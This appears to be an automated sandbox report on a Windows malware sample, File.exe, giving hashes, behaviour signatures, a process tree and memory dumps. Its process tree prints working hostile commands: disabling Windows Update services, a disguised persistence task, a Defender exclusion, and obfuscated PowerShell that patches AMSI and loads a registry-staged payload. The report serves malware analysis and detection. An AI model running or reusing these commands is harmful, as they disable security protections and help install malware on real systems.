Analysis
max time kernel: 48s
max time network: 141s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 05-05-2022 00:56
Static task: static1
Behavioral task: behavioral1
Sample: File.exe
Resource: win7-20220414-en
General
Target: File.exe
Size: 4.0MB
MD5: f74ccaec9935cca19122478058c39f79
SHA1: 5dbffbe85764d0bd43a90a1ef8eb8d8c5a540527
SHA256: 8d2d9d8d937c880d75eb1e4a930f273a0b215ba1b15c07c10a7d902f23b0b08a
SHA512: 2cb3379d4c37b2d74f3ae51a0cc0551eb146e5ff6822b0b76e15c63d9f6bd116ed569a5a72cd8be2c37695bfa5cb9ebdd08e27803a9d19cadcc6315b2ebde6ef
Malware Config
Signatures
Modifies security service (2 TTPs, 5 IoCs)
Processes: reg.exe
description | ioc | process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
Executes dropped EXE (2 IoCs)
Processes: [New]344334.exe, ger.exe
pid | process
4812 | [New]344334.exe
460 | ger.exe
Possible privilege escalation attempt (2 IoCs)
Processes: takeown.exe, icacls.exe
pid | process
760 | takeown.exe
2624 | icacls.exe
Stops running service(s) (3 TTPs)
Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes: [New]344334.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | [New]344334.exe
Modifies file permissions (1 TTPs, 2 IoCs)
Processes: takeown.exe, icacls.exe
pid | process
760 | takeown.exe
2624 | icacls.exe
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
35 | ip-api.com
Suspicious use of SetThreadContext (2 IoCs)
Processes: ger.exe, [New]344334.exe
description | pid | process | target process
PID 460 set thread context of 4852 | 460 | ger.exe | AppLaunch.exe
PID 4812 set thread context of 4444 | 4812 | [New]344334.exe | conhost.exe
Drops file in Windows directory (4 IoCs)
Processes: conhost.exe
description | ioc | process
File created | C:\Windows\Tasks\dialersvc32.job | conhost.exe
File opened for modification | C:\Windows\Tasks\dialersvc32.job | conhost.exe
File created | C:\Windows\Tasks\dialersvc64.job | conhost.exe
File opened for modification | C:\Windows\Tasks\dialersvc64.job | conhost.exe
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash (4 IoCs)
Processes: WerFault.exe
pid | pid_target | process | target process
5112 | 3308 | WerFault.exe |
3968 | 1484 | WerFault.exe |
400 | 1484 | WerFault.exe |
5072 | 3308 | WerFault.exe |
Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Modifies data under HKEY_USERS (61 IoCs)
Processes: powershell.EXE
Modifies registry key (1 TTPs, 8 IoCs)
Processes: reg.exe
pid | process
4448 | reg.exe
4284 | reg.exe
1360 | reg.exe
2576 | reg.exe
2112 | reg.exe
2128 | reg.exe
2356 | reg.exe
5096 | reg.exe
Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes: powershell.exe, [New]344334.exe, powershell.EXE
pid | process
1048 | powershell.exe
1048 | powershell.exe
4812 | [New]344334.exe
2452 | powershell.EXE
2452 | powershell.EXE
2872 | powershell.EXE
Suspicious use of AdjustPrivilegeToken (5 IoCs)
Processes: powershell.exe, AppLaunch.exe, [New]344334.exe, powershell.EXE
description | pid | process
Token: SeDebugPrivilege | 1048 | powershell.exe
Token: SeDebugPrivilege | 4852 | AppLaunch.exe
Token: SeDebugPrivilege | 4812 | [New]344334.exe
Token: SeDebugPrivilege | 2452 | powershell.EXE
Token: SeDebugPrivilege | 2872 | powershell.EXE
Suspicious use of WriteProcessMemory (47 IoCs)
Processes: File.exe, ger.exe, [New]344334.exe, cmd.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\File.exe (level 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\File.exe"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Roaming\[New]344334.exe (level 2)
    Command line: C:\Users\Admin\AppData\Roaming\[New]344334.exe
    Signatures: Executes dropped EXE; Checks computer location settings; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\cmd.exe (level 3)
      Command line: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 4)
        Command line: powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
        Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\cmd.exe (level 3)
      Command line: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\sc.exe (level 4)
        Command line: sc stop UsoSvc
      - C:\Windows\system32\sc.exe (level 4)
        Command line: sc stop WaaSMedicSvc
      - C:\Windows\system32\sc.exe (level 4)
        Command line: sc stop wuauserv
      - C:\Windows\system32\sc.exe (level 4)
        Command line: sc stop bits
      - C:\Windows\system32\sc.exe (level 4)
        Command line: sc stop dosvc
      - C:\Windows\system32\reg.exe (level 4)
        Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        Signatures: Modifies registry key
      - C:\Windows\system32\reg.exe (level 4)
        Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        Signatures: Modifies registry key
      - C:\Windows\system32\reg.exe (level 4)
        Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        Signatures: Modifies security service; Modifies registry key
      - C:\Windows\system32\reg.exe (level 4)
        Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        Signatures: Modifies registry key
      - C:\Windows\system32\reg.exe (level 4)
        Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        Signatures: Modifies registry key
      - C:\Windows\system32\takeown.exe (level 4)
        Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        Signatures: Possible privilege escalation attempt; Modifies file permissions
      - C:\Windows\system32\icacls.exe (level 4)
        Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        Signatures: Possible privilege escalation attempt; Modifies file permissions
      - C:\Windows\system32\reg.exe (level 4)
        Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        Signatures: Modifies registry key
      - C:\Windows\system32\reg.exe (level 4)
        Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        Signatures: Modifies registry key
      - C:\Windows\system32\reg.exe (level 4)
        Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        Signatures: Modifies registry key
    - C:\Windows\System32\conhost.exe (level 3)
      Command line: C:\Windows\System32\conhost.exe
      Signatures: Drops file in Windows directory
    - C:\Windows\System32\cmd.exe (level 3)
      Command line: "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\schtasks.exe (level 4)
        Command line: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe"
        Signatures: Creates scheduled task(s)
    - C:\Windows\System32\cmd.exe (level 3)
      Command line: "C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe"
      - C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe (level 4)
        Command line: C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe
        - C:\Windows\System32\cmd.exe (level 5)
          Command line: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
          - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 6)
            Command line: powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
  - C:\Users\Admin\AppData\Roaming\ger.exe (level 2)
    Command line: C:\Users\Admin\AppData\Roaming\ger.exe
    Signatures: Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe (level 3)
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      Signatures: Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE (level 1)
  Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:rGLtOhFiCmid{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$IwlXkGEmwqZBmS,[Parameter(Position=1)][Type]$ghxqtBRSGB)$HYTXuBcoLdx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$HYTXuBcoLdx.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$IwlXkGEmwqZBmS).SetImplementationFlags('Runtime,Managed');$HYTXuBcoLdx.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$ghxqtBRSGB,$IwlXkGEmwqZBmS).SetImplementationFlags('Runtime,Managed');Write-Output $HYTXuBcoLdx.CreateType();}$keeKgdZqwcuQu=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$lmBRnGZddYhsRU=$keeKgdZqwcuQu.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hNATbfoaebXSkoaAPIh=rGLtOhFiCmid @([String])([IntPtr]);$kXcPDjeZCvAGqHbJmWRqdf=rGLtOhFiCmid @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$kFDUHJKPfVu=$keeKgdZqwcuQu.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$sorrBYAHgsjTLX=$lmBRnGZddYhsRU.Invoke($Null,@([Object]$kFDUHJKPfVu,[Object]('Load'+'LibraryA')));$XgDywUZjNrbTqCukt=$lmBRnGZddYhsRU.Invoke($Null,@([Object]$kFDUHJKPfVu,[Object]('Vir'+'tual'+'Pro'+'tect')));$BTwuEjv=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sorrBYAHgsjTLX,$hNATbfoaebXSkoaAPIh).Invoke('a'+'m'+'si.dll');$VLgICEuFpaNOwkUMk=$lmBRnGZddYhsRU.Invoke($Null,@([Object]$BTwuEjv,[Object]('Ams'+'iSc'+'an'+'Buffer')));$VHdOFdKCSa=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XgDywUZjNrbTqCukt,$kXcPDjeZCvAGqHbJmWRqdf).Invoke($VLgICEuFpaNOwkUMk,[uint32]8,4,[ref]$VHdOFdKCSa);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$VLgICEuFpaNOwkUMk,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XgDywUZjNrbTqCukt,$kXcPDjeZCvAGqHbJmWRqdf).Invoke($VLgICEuFpaNOwkUMk,[uint32]8,0x20,[ref]$VHdOFdKCSa);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
  Signatures: Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (level 1)
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:lidnqEOIVwEG{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vNUMrRLSZXBjgG,[Parameter(Position=1)][Type]$AnHDgJfxAO)$WgstumZpaFr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$WgstumZpaFr.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$vNUMrRLSZXBjgG).SetImplementationFlags('Runtime,Managed');$WgstumZpaFr.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$AnHDgJfxAO,$vNUMrRLSZXBjgG).SetImplementationFlags('Runtime,Managed');Write-Output $WgstumZpaFr.CreateType();}$hBQlRohaBMdUo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$rMJmrNKHNnAqkY=$hBQlRohaBMdUo.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XhsktYzjyMofJVtXwqs=lidnqEOIVwEG @([String])([IntPtr]);$DquWmwJESRZiqJSKfIKhvr=lidnqEOIVwEG @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$pUouaoPSBEI=$hBQlRohaBMdUo.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$xrMJDGyXylXHva=$rMJmrNKHNnAqkY.Invoke($Null,@([Object]$pUouaoPSBEI,[Object]('Load'+'LibraryA')));$DboijGHkrpDUyNTWk=$rMJmrNKHNnAqkY.Invoke($Null,@([Object]$pUouaoPSBEI,[Object]('Vir'+'tual'+'Pro'+'tect')));$QWDsDYe=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xrMJDGyXylXHva,$XhsktYzjyMofJVtXwqs).Invoke('a'+'m'+'si.dll');$POdrWVseLQWFgGpcg=$rMJmrNKHNnAqkY.Invoke($Null,@([Object]$QWDsDYe,[Object]('Ams'+'iSc'+'an'+'Buffer')));$WedNKnyFXl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DboijGHkrpDUyNTWk,$DquWmwJESRZiqJSKfIKhvr).Invoke($POdrWVseLQWFgGpcg,[uint32]8,4,[ref]$WedNKnyFXl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$POdrWVseLQWFgGpcg,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DboijGHkrpDUyNTWk,$DquWmwJESRZiqJSKfIKhvr).Invoke($POdrWVseLQWFgGpcg,[uint32]8,0x20,[ref]$WedNKnyFXl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
  Signatures: Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\dllhost.exe (level 1)
  Command line: C:\Windows\System32\dllhost.exe /Processid:{364bf40b-3cad-4ad6-9fa8-d40b12851d88}
- C:\Windows\system32\WerFault.exe (level 1)
  Command line: C:\Windows\system32\WerFault.exe -pss -s 456 -p 3308 -ip 3308
- C:\Windows\system32\WerFault.exe (level 1)
  Command line: C:\Windows\system32\WerFault.exe -pss -s 448 -p 1484 -ip 1484
- C:\Windows\system32\WerFault.exe (level 1)
  Command line: C:\Windows\system32\WerFault.exe -u -p 3308 -s 936
  Signatures: Program crash
- C:\Windows\system32\WerFault.exe (level 1)
  Command line: C:\Windows\system32\WerFault.exe -u -p 1484 -s 352
  Signatures: Program crash
- C:\Windows\system32\WerFault.exe (level 1)
  Command line: C:\Windows\system32\WerFault.exe -u -p 1484 -s 352
  Signatures: Program crash
- C:\Windows\system32\WerFault.exe (level 1)
  Command line: C:\Windows\system32\WerFault.exe -u -p 3308 -s 936
  Signatures: Program crash
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
168KB
-
memory/1388-202-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1396-208-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1492-206-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1552-207-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1576-212-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1608-312-0x0000022CC2B70000-0x0000022CC2B9A000-memory.dmpFilesize
168KB
-
memory/1608-261-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1628-211-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1652-209-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1696-210-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1764-219-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1772-289-0x000002207DD40000-0x000002207DD6A000-memory.dmpFilesize
168KB
-
memory/1772-286-0x0000000000000000-mapping.dmp
-
memory/1772-291-0x000002207E150000-0x000002207E17A000-memory.dmpFilesize
168KB
-
memory/1820-166-0x0000000000000000-mapping.dmp
-
memory/1824-214-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1828-223-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1860-218-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1868-217-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1884-195-0x0000000000000000-mapping.dmp
-
memory/1900-216-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1964-215-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2036-213-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2044-281-0x000001F891A00000-0x000001F891A2A000-memory.dmpFilesize
168KB
-
memory/2112-318-0x0000000000000000-mapping.dmp
-
memory/2128-349-0x0000000000000000-mapping.dmp
-
memory/2132-148-0x0000000000000000-mapping.dmp
-
memory/2176-196-0x0000000000000000-mapping.dmp
-
memory/2176-199-0x00007FFCB62C0000-0x00007FFCB6D81000-memory.dmpFilesize
10.8MB
-
memory/2192-163-0x0000000000000000-mapping.dmp
-
memory/2200-222-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2228-187-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/2228-188-0x00007FFCD51F0000-0x00007FFCD53E5000-memory.dmpFilesize
2.0MB
-
memory/2228-184-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/2228-185-0x00000001400024C8-mapping.dmp
-
memory/2228-191-0x00007FFCD4220000-0x00007FFCD42DE000-memory.dmpFilesize
760KB
-
memory/2228-194-0x00007FFCD51F0000-0x00007FFCD53E5000-memory.dmpFilesize
2.0MB
-
memory/2228-193-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/2228-186-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/2348-220-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2356-368-0x0000000000000000-mapping.dmp
-
memory/2364-232-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2440-233-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2452-192-0x00007FFCD4220000-0x00007FFCD42DE000-memory.dmpFilesize
760KB
-
memory/2452-189-0x00007FFCD51F0000-0x00007FFCD53E5000-memory.dmpFilesize
2.0MB
-
memory/2452-182-0x00007FFCD51F0000-0x00007FFCD53E5000-memory.dmpFilesize
2.0MB
-
memory/2452-183-0x00007FFCD4220000-0x00007FFCD42DE000-memory.dmpFilesize
760KB
-
memory/2452-172-0x00007FFCB62A0000-0x00007FFCB6D61000-memory.dmpFilesize
10.8MB
-
memory/2488-245-0x0000017C5DDC0000-0x0000017C5DDEA000-memory.dmpFilesize
168KB
-
memory/2488-238-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2500-246-0x000001945F460000-0x000001945F48A000-memory.dmpFilesize
168KB
-
memory/2500-239-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2576-178-0x0000000000000000-mapping.dmp
-
memory/2576-284-0x0000000000000000-mapping.dmp
-
memory/2576-294-0x000002154E8E0000-0x000002154E90A000-memory.dmpFilesize
168KB
-
memory/2604-240-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2604-247-0x000001AC65270000-0x000001AC6529A000-memory.dmpFilesize
168KB
-
memory/2616-248-0x000002BB8A780000-0x000002BB8A7AA000-memory.dmpFilesize
168KB
-
memory/2616-241-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2624-282-0x000002A98DDE0000-0x000002A98DE0A000-memory.dmpFilesize
168KB
-
memory/2624-181-0x0000000000000000-mapping.dmp
-
memory/2664-242-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2696-243-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2720-244-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2728-254-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2728-274-0x00000262EEB70000-0x00000262EEB9A000-memory.dmpFilesize
168KB
-
memory/2872-170-0x0000000004740000-0x0000000004D68000-memory.dmpFilesize
6.2MB
-
memory/2872-180-0x0000000005650000-0x000000000566E000-memory.dmpFilesize
120KB
-
memory/2872-176-0x0000000004EE0000-0x0000000004F46000-memory.dmpFilesize
408KB
-
memory/2872-169-0x0000000004020000-0x0000000004056000-memory.dmpFilesize
216KB
-
memory/2872-174-0x0000000004600000-0x0000000004622000-memory.dmpFilesize
136KB
-
memory/2872-321-0x0000000007E50000-0x00000000084CA000-memory.dmpFilesize
6.5MB
-
memory/3112-283-0x000001A24A540000-0x000001A24A56A000-memory.dmpFilesize
168KB
-
memory/3112-256-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/3476-257-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/3476-285-0x000001F6F4280000-0x000001F6F42AA000-memory.dmpFilesize
168KB
-
memory/3516-311-0x0000015742E50000-0x0000015742E7A000-memory.dmpFilesize
168KB
-
memory/3744-287-0x000001CFD7A60000-0x000001CFD7A8A000-memory.dmpFilesize
168KB
-
memory/3744-258-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/3832-345-0x0000000000000000-mapping.dmp
-
memory/3968-293-0x0000000000000000-mapping.dmp
-
memory/3968-298-0x00000228D5B90000-0x00000228D5BBA000-memory.dmpFilesize
168KB
-
memory/4016-259-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/4016-299-0x000001BAA0700000-0x000001BAA072A000-memory.dmpFilesize
168KB
-
memory/4220-279-0x000001D0D9FF0000-0x000001D0DA01A000-memory.dmpFilesize
168KB
-
memory/4220-153-0x0000000000000000-mapping.dmp
-
memory/4260-167-0x0000000000000000-mapping.dmp
-
memory/4284-173-0x0000000000000000-mapping.dmp
-
memory/4292-155-0x0000000000000000-mapping.dmp
-
memory/4444-158-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/4444-156-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/4444-161-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/4444-159-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/4444-157-0x0000000140002348-mapping.dmp
-
memory/4448-171-0x0000000000000000-mapping.dmp
-
